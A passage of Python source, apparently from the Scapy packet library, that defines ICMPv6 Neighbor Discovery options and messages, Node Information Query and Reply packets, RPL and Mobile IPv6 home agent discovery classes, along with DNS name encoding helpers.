1911class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
1912 name = "ICMPv6 Neighbor Discovery - Home Agent Information"
1913 fields_desc = [ByteField("type", 8),
1914 ByteField("len", 1),
1915 ShortField("res", 0),
1916 ShortField("pref", 0),
1917 ShortField("lifetime", 1)]
1919 def mysummary(self):
1920 return self.sprintf("%name% %pref% %lifetime% seconds")
1922# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1924# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1927class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1928 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
1929 fields_desc = [ByteField("type", 17),
1930 ByteField("len", 3),
1931 ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
1932 2: "New Care-Of Address",
1933 3: "NAR's IP address"}),
1934 ByteField("plen", 64),
1935 IntField("res", 0),
1936 IP6Field("addr", "::")]
1939class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1940 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501
1941 fields_desc = [ByteField("type", 18),
1942 ByteField("len", 3),
1943 ByteField("optcode", 0),
1944 ByteField("plen", 64),
1945 IntField("res", 0),
1946 IP6Field("prefix", "::")]
1949_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1950 1: "LLA for the new AP",
1951 2: "LLA of the MN",
1952 3: "LLA of the NAR",
1953 4: "LLA of the src of TrSolPr or PrRtAdv msg",
1954 5: "AP identified by LLA belongs to current iface of router", # noqa: E501
1955 6: "No preifx info available for AP identified by the LLA", # noqa: E501
1956 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501
1959class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1960 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501
1961 fields_desc = [ByteField("type", 19),
1962 ByteField("len", 1),
1963 ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
1964 MACField("lla", ETHER_ANY)] # We only support ethernet
1967class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
1968 name = "ICMPv6 Neighbor Discovery - MAP Option"
1969 fields_desc = [ByteField("type", 23),
1970 ByteField("len", 3),
1971 BitField("dist", 1, 4),
1972 BitField("pref", 15, 4), # highest availability
1973 BitField("R", 1, 1),
1974 BitField("res", 0, 7),
1975 IntField("validlifetime", 0xffffffff),
1976 IP6Field("addr", "::")]
1979class _IP6PrefixField(IP6Field):
1980 __slots__ = ["length_from"]
1982 def __init__(self, name, default):
1983 IP6Field.__init__(self, name, default)
1984 self.length_from = lambda pkt: 8 * (pkt.len - 1)
1986 def addfield(self, pkt, s, val):
1987 return s + self.i2m(pkt, val)
1989 def getfield(self, pkt, s):
1990 tmp_len = self.length_from(pkt)
1991 p = s[:tmp_len]
1992 if tmp_len < 16:
1993 p += b'\x00' * (16 - tmp_len)
1994 return s[tmp_len:], self.m2i(pkt, p)
1996 def i2len(self, pkt, x):
1997 return len(self.i2m(pkt, x))
1999 def i2m(self, pkt, x):
2000 tmp_len = pkt.len
2002 if x is None:
2003 x = "::"
2004 if tmp_len is None:
2005 tmp_len = 1
2006 x = inet_pton(socket.AF_INET6, x)
2008 if tmp_len is None:
2009 return x
2010 if tmp_len in [0, 1]:
2011 return b""
2012 if tmp_len in [2, 3]:
2013 return x[:8 * (tmp_len - 1)]
2015 return x + b'\x00' * 8 * (tmp_len - 3)
2018class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
2019 name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
2020 fields_desc = [ByteField("type", 24),
2021 FieldLenField("len", None, length_of="prefix", fmt="B",
2022 adjust=lambda pkt, x: x // 8 + 1),
2023 ByteField("plen", None),
2024 BitField("res1", 0, 3),
2025 BitEnumField("prf", 0, 2, icmp6ndraprefs),
2026 BitField("res2", 0, 3),
2027 IntField("rtlifetime", 0xffffffff),
2028 _IP6PrefixField("prefix", None)]
2030 def mysummary(self):
2031 return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2034class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
2035 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
2036 fields_desc = [ByteField("type", 25),
2037 FieldLenField("len", None, count_of="dns", fmt="B",
2038 adjust=lambda pkt, x: 2 * x + 1),
2039 ShortField("res", None),
2040 IntField("lifetime", 0xffffffff),
2041 IP6ListField("dns", [],
2042 length_from=lambda pkt: 8 * (pkt.len - 1))]
2044 def mysummary(self):
2045 return self.sprintf("%name% ") + ", ".join(self.dns)
2048class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
2049 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
2050 fields_desc = [ByteField("type", 26),
2051 ByteField("len", 1),
2052 BitField("res", 0, 48)]
2054# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2055# described in section 3.1 of RFC 1035
2056# XXX Label should be at most 63 octets in length : we do not enforce it
2057# Total length of domain should be 255 : we do not enforce it either
2060class DomainNameListField(StrLenField):
2061 __slots__ = ["padded"]
2062 islist = 1
2063 padded_unit = 8
2065 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501
2066 self.padded = padded
2067 StrLenField.__init__(self, name, default, length_from=length_from)
2069 def i2len(self, pkt, x):
2070 return len(self.i2m(pkt, x))
2072 def i2h(self, pkt, x):
2073 if not x:
2074 return []
2075 return x
2077 def m2i(self, pkt, x):
2078 x = plain_str(x) # Decode bytes to string
2079 res = []
2080 while x:
2081 # Get a name until \x00 is reached
2082 cur = []
2083 while x and ord(x[0]) != 0:
2084 tmp_len = ord(x[0])
2085 cur.append(x[1:tmp_len + 1])
2086 x = x[tmp_len + 1:]
2087 if self.padded:
2088 # Discard following \x00 in padded mode
2089 if len(cur):
2090 res.append(".".join(cur) + ".")
2091 else:
2092 # Store the current name
2093 res.append(".".join(cur) + ".")
2094 if x and ord(x[0]) == 0:
2095 x = x[1:]
2096 return res
2098 def i2m(self, pkt, x):
2099 def conditionalTrailingDot(z):
2100 if z and orb(z[-1]) == 0:
2101 return z
2102 return z + b'\x00'
2103 # Build the encode names
2104 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501
2105 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
2107 # In padded mode, add some \x00 bytes
2108 if self.padded and not len(ret_string) % self.padded_unit == 0:
2109 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501
2111 return ret_string
2114class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
2115 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
2116 fields_desc = [ByteField("type", 31),
2117 FieldLenField("len", None, length_of="searchlist", fmt="B",
2118 adjust=lambda pkt, x: 1 + x // 8),
2119 ShortField("res", None),
2120 IntField("lifetime", 0xffffffff),
2121 DomainNameListField("searchlist", [],
2122 length_from=lambda pkt: 8 * pkt.len - 8,
2123 padded=True)
2124 ]
2126 def mysummary(self):
2127 return self.sprintf("%name% ") + ", ".join(self.searchlist)
2130class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910
2131 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
2132 fields_desc = [ByteField("type", 37),
2133 FieldLenField("len", None, length_of="URI", fmt="B",
2134 adjust=lambda pkt, x: (2 + x) // 8),
2135 ICMPv6NDOptDataField("URI", "", strip_zeros=True,
2136 length_from=lambda pkt:
2137 8 * max(pkt.len, 1) - 2)]
2139 def mysummary(self):
2140 return self.sprintf("%name% %URI%")
2143class _PREF64(IP6Field):
2144 def addfield(self, pkt, s, val):
2145 return s + self.i2m(pkt, val)[:12]
2147 def getfield(self, pkt, s):
2148 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4)
2151class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781
2152 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
2153 fields_desc = [ByteField("type", 38),
2154 ByteField("len", 2),
2155 BitField("scaledlifetime", 0, 13),
2156 BitEnumField("plc", 0, 3,
2157 ["/96", "/64", "/56", "/48", "/40", "/32"]),
2158 _PREF64("prefix", "::")]
2160 def mysummary(self):
2161 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
2162 return self.sprintf("%name% %prefix%") + plc
2164# End of ICMPv6 Neighbor Discovery Options.
2167class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
2168 name = "ICMPv6 Neighbor Discovery - Router Solicitation"
2169 fields_desc = [ByteEnumField("type", 133, icmp6types),
2170 ByteField("code", 0),
2171 XShortField("cksum", None),
2172 IntField("res", 0)]
2173 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2176class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
2177 name = "ICMPv6 Neighbor Discovery - Router Advertisement"
2178 fields_desc = [ByteEnumField("type", 134, icmp6types),
2179 ByteField("code", 0),
2180 XShortField("cksum", None),
2181 ByteField("chlim", 0),
2182 BitField("M", 0, 1),
2183 BitField("O", 0, 1),
2184 BitField("H", 0, 1),
2185 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191
2186 BitField("P", 0, 1),
2187 BitField("res", 0, 2),
2188 ShortField("routerlifetime", 1800),
2189 IntField("reachabletime", 0),
2190 IntField("retranstimer", 0)]
2191 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2193 def answers(self, other):
2194 return isinstance(other, ICMPv6ND_RS)
2196 def mysummary(self):
2197 return self.sprintf("%name% Lifetime %routerlifetime% "
2198 "Hop Limit %chlim% Preference %prf% "
2199 "Managed %M% Other %O% Home %H%")
2202class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2203 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
2204 fields_desc = [ByteEnumField("type", 135, icmp6types),
2205 ByteField("code", 0),
2206 XShortField("cksum", None),
2207 IntField("res", 0),
2208 IP6Field("tgt", "::")]
2209 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2211 def mysummary(self):
2212 return self.sprintf("%name% (tgt: %tgt%)")
2214 def hashret(self):
2215 return bytes_encode(self.tgt) + self.payload.hashret()
2218class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2219 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
2220 fields_desc = [ByteEnumField("type", 136, icmp6types),
2221 ByteField("code", 0),
2222 XShortField("cksum", None),
2223 BitField("R", 1, 1),
2224 BitField("S", 0, 1),
2225 BitField("O", 1, 1),
2226 XBitField("res", 0, 29),
2227 IP6Field("tgt", "::")]
2228 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2230 def mysummary(self):
2231 return self.sprintf("%name% (tgt: %tgt%)")
2233 def hashret(self):
2234 return bytes_encode(self.tgt) + self.payload.hashret()
2236 def answers(self, other):
2237 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2239# associated possible options : target link-layer option, Redirected header
2242class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2243 name = "ICMPv6 Neighbor Discovery - Redirect"
2244 fields_desc = [ByteEnumField("type", 137, icmp6types),
2245 ByteField("code", 0),
2246 XShortField("cksum", None),
2247 XIntField("res", 0),
2248 IP6Field("tgt", "::"),
2249 IP6Field("dst", "::")]
2250 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2253# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2255class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
2256 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
2257 fields_desc = [ByteField("type", 9),
2258 FieldLenField("len", None, count_of="addrlist", fmt="B",
2259 adjust=lambda pkt, x: 2 * x + 1),
2260 StrFixedLenField("res", b"\x00" * 6, 6),
2261 IP6ListField("addrlist", [],
2262 length_from=lambda pkt: 8 * (pkt.len - 1))]
2265class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
2266 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2267 type = 10
2270# RFC3122
2271# Options requises : source lladdr et target lladdr
2272# Autres options valides : source address list, MTU
2273# - Comme precise dans le document, il serait bien de prendre l'adresse L2
2274# demandee dans l'option requise target lladdr et l'utiliser au niveau
2275# de l'adresse destination ethernet si aucune adresse n'est precisee
2276# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
2277# les options.
2278# Ether() must use the target lladdr as destination
2279class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
2280 name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
2281 fields_desc = [ByteEnumField("type", 141, icmp6types),
2282 ByteField("code", 0),
2283 XShortField("cksum", None),
2284 XIntField("reserved", 0)]
2285 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2287# Options requises : target lladdr, target address list
2288# Autres options valides : MTU
2291class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2292 name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
2293 fields_desc = [ByteEnumField("type", 142, icmp6types),
2294 ByteField("code", 0),
2295 XShortField("cksum", None),
2296 XIntField("reserved", 0)]
2297 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2300###############################################################################
2301# ICMPv6 Node Information Queries (RFC 4620)
2302###############################################################################
2304# [ ] Add automatic destination address computation using computeNIGroupAddr
2305# in IPv6 class (Scapy6 modification when integrated) if :
2306# - it is not provided
2307# - upper layer is ICMPv6NIQueryName() with a valid value
2308# [ ] Try to be liberal in what we accept as internal values for _explicit_
2309# DNS elements provided by users. Any string should be considered
2310# valid and kept like it has been provided. At the moment, i2repr() will
2311# crash on many inputs
2312# [ ] Do the documentation
2313# [ ] Add regression tests
2314# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2315# [ ] Check if there are differences between different stacks. Among *BSD,
2316# with others.
2317# [ ] Deal with flags in a consistent way.
2318# [ ] Implement compression in names2dnsrepr() and decompresiion in
2319# dnsrepr2names(). Should be deactivable.
2321icmp6_niqtypes = {0: "NOOP",
2322 2: "Node Name",
2323 3: "IPv6 Address",
2324 4: "IPv4 Address"}
2327class _ICMPv6NIHashret:
2328 def hashret(self):
2329 return bytes_encode(self.nonce)
2332class _ICMPv6NIAnswers:
2333 def answers(self, other):
2334 return self.nonce == other.nonce
2336# Buggy; always returns the same value during a session
2339class NonceField(StrFixedLenField):
2340 def __init__(self, name, default=None):
2341 StrFixedLenField.__init__(self, name, default, 8)
2342 if default is None:
2343 self.default = self.randval()
2346@conf.commands.register
2347def computeNIGroupAddr(name):
2348 """Compute the NI group Address. Can take a FQDN as input parameter"""
2349 name = name.lower().split(".")[0]
2350 record = chr(len(name)) + name
2351 h = md5(record.encode("utf8"))
2352 h = h.digest()
2353 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
2354 return addr
2357# Here is the deal. First, that protocol is a piece of shit. Then, we
2358# provide 4 classes for the different kinds of Requests (one for every
2359# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2360# data field class that is made to be smart by guessing the specific
2361# type of value provided :
2362#
2363# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2364# if not overridden by user
2365# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2366# if not overridden
2367# - Name in the other cases: code is set to 0, if not overridden by user
2368#
2369# Internal storage, is not only the value, but the a pair providing
2370# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
2371#
2372# Note : I merged getfield() and m2i(). m2i() should not be called
2373# directly anyway. Same remark for addfield() and i2m()
2374#
2375# -- arno
2377# "The type of information present in the Data field of a query is
2378# declared by the ICMP Code, whereas the type of information in a
2379# Reply is determined by the Qtype"
2381def names2dnsrepr(x):
2382 """
2383 Take as input a list of DNS names or a single DNS name
2384 and encode it in DNS format (with possible compression)
2385 If a string that is already a DNS name in DNS format
2386 is passed, it is returned unmodified. Result is a string.
2387 !!! At the moment, compression is not implemented !!!
2388 """
2390 if isinstance(x, bytes):
2391 if x and x[-1:] == b'\x00': # stupid heuristic
2392 return x
2393 x = [x]
2395 res = []
2396 for n in x:
2397 termin = b"\x00"
2398 if n.count(b'.') == 0: # single-component gets one more
2399 termin += b'\x00'
2400 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
2401 res.append(n)
2402 return b"".join(res)
2405def dnsrepr2names(x):
2406 """
2407 Take as input a DNS encoded string (possibly compressed)
2408 and returns a list of DNS names contained in it.
2409 If provided string is already in printable format
2410 (does not end with a null character, a one element list
2411 is returned). Result is a list.
2412 """
2413 res = []
2414 cur = b""
2415 while x:
2416 tmp_len = orb(x[0])
2417 x = x[1:]
2418 if not tmp_len:
2419 if cur and cur[-1:] == b'.':
2420 cur = cur[:-1]
2421 res.append(cur)
2422 cur = b""
2423 if x and orb(x[0]) == 0: # single component
2424 x = x[1:]
2425 continue
2426 if tmp_len & 0xc0: # XXX TODO : work on that -- arno
2427 raise Exception("DNS message can't be compressed at this point!")
2428 cur += x[:tmp_len] + b"."
2429 x = x[tmp_len:]
2430 return res
2433class NIQueryDataField(StrField):
2434 def __init__(self, name, default):
2435 StrField.__init__(self, name, default)
2437 def i2h(self, pkt, x):
2438 if x is None:
2439 return x
2440 t, val = x
2441 if t == 1:
2442 val = dnsrepr2names(val)[0]
2443 return val
2445 def h2i(self, pkt, x):
2446 if x is tuple and isinstance(x[0], int):
2447 return x
2449 # Try IPv6
2450 try:
2451 inet_pton(socket.AF_INET6, x.decode())
2452 return (0, x.decode())
2453 except Exception:
2454 pass
2455 # Try IPv4
2456 try:
2457 inet_pton(socket.AF_INET, x.decode())
2458 return (2, x.decode())
2459 except Exception:
2460 pass
2461 # Try DNS
2462 if x is None:
2463 x = b""
2464 x = names2dnsrepr(x)
2465 return (1, x)
2467 def i2repr(self, pkt, x):
2468 t, val = x
2469 if t == 1: # DNS Name
2470 # we don't use dnsrepr2names() to deal with
2471 # possible weird data extracted info
2472 res = []
2473 while val:
2474 tmp_len = orb(val[0])
2475 val = val[1:]
2476 if tmp_len == 0:
2477 break
2478 res.append(plain_str(val[:tmp_len]) + ".")
2479 val = val[tmp_len:]
2480 tmp = "".join(res)
2481 if tmp and tmp[-1] == '.':
2482 tmp = tmp[:-1]
2483 return tmp
2484 return repr(val)
2486 def getfield(self, pkt, s):
2487 qtype = getattr(pkt, "qtype")
2488 if qtype == 0: # NOOP
2489 return s, (0, b"")
2490 else:
2491 code = getattr(pkt, "code")
2492 if code == 0: # IPv6 Addr
2493 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2494 elif code == 2: # IPv4 Addr
2495 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2496 else: # Name or Unknown
2497 return b"", (1, s)
2499 def addfield(self, pkt, s, val):
2500 if ((isinstance(val, tuple) and val[1] is None) or
2501 val is None):
2502 val = (1, b"")
2503 t = val[0]
2504 if t == 1:
2505 return s + val[1]
2506 elif t == 0:
2507 return s + inet_pton(socket.AF_INET6, val[1])
2508 else:
2509 return s + inet_pton(socket.AF_INET, val[1])
2512class NIQueryCodeField(ByteEnumField):
2513 def i2m(self, pkt, x):
2514 if x is None:
2515 d = pkt.getfieldval("data")
2516 if d is None:
2517 return 1
2518 elif d[0] == 0: # IPv6 address
2519 return 0
2520 elif d[0] == 1: # Name
2521 return 1
2522 elif d[0] == 2: # IPv4 address
2523 return 2
2524 else:
2525 return 1
2526 return x
2529_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2531# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2532# 8: "Link-local addresses", 16: "Site-local addresses",
2533# 32: "Global addresses" }
2535# "This NI type has no defined flags and never has a Data Field". Used
2536# to know if the destination is up and implements NI protocol.
2539class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
2540 name = "ICMPv6 Node Information Query - NOOP Query"
2541 fields_desc = [ByteEnumField("type", 139, icmp6types),
2542 NIQueryCodeField("code", None, _niquery_code),
2543 XShortField("cksum", None),
2544 ShortEnumField("qtype", 0, icmp6_niqtypes),
2545 BitField("unused", 0, 10),
2546 FlagsField("flags", 0, 6, "TACLSG"),
2547 NonceField("nonce", None),
2548 NIQueryDataField("data", None)]
2551class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
2552 name = "ICMPv6 Node Information Query - IPv6 Name Query"
2553 qtype = 2
2555# We ask for the IPv6 address of the peer
2558class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
2559 name = "ICMPv6 Node Information Query - IPv6 Address Query"
2560 qtype = 3
2561 flags = 0x3E
2564class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
2565 name = "ICMPv6 Node Information Query - IPv4 Address Query"
2566 qtype = 4
2569_nireply_code = {0: "Successful Reply",
2570 1: "Response Refusal",
2571 3: "Unknown query type"}
2573_nireply_flags = {1: "Reply set incomplete",
2574 2: "All unicast addresses",
2575 4: "IPv4 addresses",
2576 8: "Link-local addresses",
2577 16: "Site-local addresses",
2578 32: "Global addresses"}
2580# Internal repr is one of those :
2581# (0, "some string") : unknown qtype value are mapped to that one
2582# (3, [ (ttl, ip6), ... ])
2583# (4, [ (ttl, ip4), ... ])
2584# (2, [ttl, dns_names]) : dns_names is one string that contains
2585# all the DNS names. Internally it is kept ready to be sent
2586# (undissected). i2repr() decode it for user. This is to
2587# make build after dissection bijective.
2588#
2589# I also merged getfield() and m2i(), and addfield() and i2m().
2592class NIReplyDataField(StrField):
2594 def i2h(self, pkt, x):
2595 if x is None:
2596 return x
2597 t, val = x
2598 if t == 2:
2599 ttl, dnsnames = val
2600 val = [ttl] + dnsrepr2names(dnsnames)
2601 return val
2603 def h2i(self, pkt, x):
2604 qtype = 0 # We will decode it as string if not
2605 # overridden through 'qtype' in pkt
2607 # No user hint, let's use 'qtype' value for that purpose
2608 if not isinstance(x, tuple):
2609 if pkt is not None:
2610 qtype = pkt.qtype
2611 else:
2612 qtype = x[0]
2613 x = x[1]
2615 # From that point on, x is the value (second element of the tuple)
2617 if qtype == 2: # DNS name
2618 if isinstance(x, (str, bytes)): # listify the string
2619 x = [x]
2620 if isinstance(x, list):
2621 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501
2622 if x and isinstance(x[0], int):
2623 ttl = x[0]
2624 names = x[1:]
2625 else:
2626 ttl = 0
2627 names = x
2628 return (2, [ttl, names2dnsrepr(names)])
2630 elif qtype in [3, 4]: # IPv4 or IPv6 addr
2631 if not isinstance(x, list):
2632 x = [x] # User directly provided an IP, instead of list
2634 def fixvalue(x):
2635 # List elements are not tuples, user probably
2636 # omitted ttl value : we will use 0 instead
2637 if not isinstance(x, tuple):
2638 x = (0, x)
2639 # Decode bytes
2640 if isinstance(x[1], bytes):
2641 x = (x[0], x[1].decode())
2642 return x
2644 return (qtype, [fixvalue(d) for d in x])
2646 return (qtype, x)
2648 def addfield(self, pkt, s, val):
2649 t, tmp = val
2650 if tmp is None:
2651 tmp = b""
2652 if t == 2:
2653 ttl, dnsstr = tmp
2654 return s + struct.pack("!I", ttl) + dnsstr
2655 elif t == 3:
2656 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501
2657 elif t == 4:
2658 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501
2659 else:
2660 return s + tmp
2662 def getfield(self, pkt, s):
2663 code = getattr(pkt, "code")
2664 if code != 0:
2665 return s, (0, b"")
2667 qtype = getattr(pkt, "qtype")
2668 if qtype == 0: # NOOP
2669 return s, (0, b"")
2671 elif qtype == 2:
2672 if len(s) < 4:
2673 return s, (0, b"")
2674 ttl = struct.unpack("!I", s[:4])[0]
2675 return b"", (2, [ttl, s[4:]])
2677 elif qtype == 3: # IPv6 addresses with TTLs
2678 # XXX TODO : get the real length
2679 res = []
2680 while len(s) >= 20: # 4 + 16
2681 ttl = struct.unpack("!I", s[:4])[0]
2682 ip = inet_ntop(socket.AF_INET6, s[4:20])
2683 res.append((ttl, ip))
2684 s = s[20:]
2685 return s, (3, res)
2687 elif qtype == 4: # IPv4 addresses with TTLs
2688 # XXX TODO : get the real length
2689 res = []
2690 while len(s) >= 8: # 4 + 4
2691 ttl = struct.unpack("!I", s[:4])[0]
2692 ip = inet_ntop(socket.AF_INET, s[4:8])
2693 res.append((ttl, ip))
2694 s = s[8:]
2695 return s, (4, res)
2696 else:
2697 # XXX TODO : implement me and deal with real length
2698 return b"", (0, s)
2700 def i2repr(self, pkt, x):
2701 if x is None:
2702 return "[]"
2704 if isinstance(x, tuple) and len(x) == 2:
2705 t, val = x
2706 if t == 2: # DNS names
2707 ttl, tmp_len = val
2708 tmp_len = dnsrepr2names(tmp_len)
2709 names_list = (plain_str(name) for name in tmp_len)
2710 return "ttl:%d %s" % (ttl, ",".join(names_list))
2711 elif t == 3 or t == 4:
2712 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501
2713 return repr(val)
2714 return repr(x) # XXX should not happen
2716# By default, sent responses have code set to 0 (successful)
2719class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
2720 name = "ICMPv6 Node Information Reply - NOOP Reply"
2721 fields_desc = [ByteEnumField("type", 140, icmp6types),
2722 ByteEnumField("code", 0, _nireply_code),
2723 XShortField("cksum", None),
2724 ShortEnumField("qtype", 0, icmp6_niqtypes),
2725 BitField("unused", 0, 10),
2726 FlagsField("flags", 0, 6, "TACLSG"),
2727 NonceField("nonce", None),
2728 NIReplyDataField("data", None)]
2731class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
2732 name = "ICMPv6 Node Information Reply - Node Names"
2733 qtype = 2
2736class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
2737 name = "ICMPv6 Node Information Reply - IPv6 addresses"
2738 qtype = 3
2741class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
2742 name = "ICMPv6 Node Information Reply - IPv4 addresses"
2743 qtype = 4
2746class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
2747 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
2748 code = 1
2751class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
2752 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
2753 code = 2
2756def _niquery_guesser(p):
2757 cls = conf.raw_layer
2758 type = orb(p[0])
2759 if type == 139: # Node Info Query specific stuff
2760 if len(p) > 6:
2761 qtype, = struct.unpack("!H", p[4:6])
2762 cls = {0: ICMPv6NIQueryNOOP,
2763 2: ICMPv6NIQueryName,
2764 3: ICMPv6NIQueryIPv6,
2765 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer)
2766 elif type == 140: # Node Info Reply specific stuff
2767 code = orb(p[1])
2768 if code == 0:
2769 if len(p) > 6:
2770 qtype, = struct.unpack("!H", p[4:6])
2771 cls = {2: ICMPv6NIReplyName,
2772 3: ICMPv6NIReplyIPv6,
2773 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP)
2774 elif code == 1:
2775 cls = ICMPv6NIReplyRefuse
2776 elif code == 2:
2777 cls = ICMPv6NIReplyUnknown
2778 return cls
2781#############################################################################
2782#############################################################################
2783# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2784#############################################################################
2785#############################################################################
2787# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
2788rplcodes = {0: "DIS",
2789 1: "DIO",
2790 2: "DAO",
2791 3: "DAO-ACK",
2792 # 4: "P2P-DRO",
2793 # 5: "P2P-DRO-ACK",
2794 # 6: "Measurement",
2795 7: "DCO",
2796 8: "DCO-ACK"}
2799class ICMPv6RPL(_ICMPv6): # RFC 6550
2800 name = 'RPL'
2801 fields_desc = [ByteEnumField("type", 155, icmp6types),
2802 ByteEnumField("code", 0, rplcodes),
2803 XShortField("cksum", None)]
2804 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2807#############################################################################
2808#############################################################################
2809# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2810#############################################################################
2811#############################################################################
2813# Mobile IPv6 ICMPv6 related classes
2815class ICMPv6HAADRequest(_ICMPv6):
2816 name = 'ICMPv6 Home Agent Address Discovery Request'
2817 fields_desc = [ByteEnumField("type", 144, icmp6types),
2818 ByteField("code", 0),
2819 XShortField("cksum", None),
2820 XShortField("id", None),
2821 BitEnumField("R", 1, 1, {1: 'MR'}),
2822 XBitField("res", 0, 15)]
2824 def hashret(self):
2825 return struct.pack("!H", self.id) + self.payload.hashret()
2828class ICMPv6HAADReply(_ICMPv6):
2829 name = 'ICMPv6 Home Agent Address Discovery Reply'
2830 fields_desc = [ByteEnumField("type", 145, icmp6types),
2831 ByteField("code", 0),
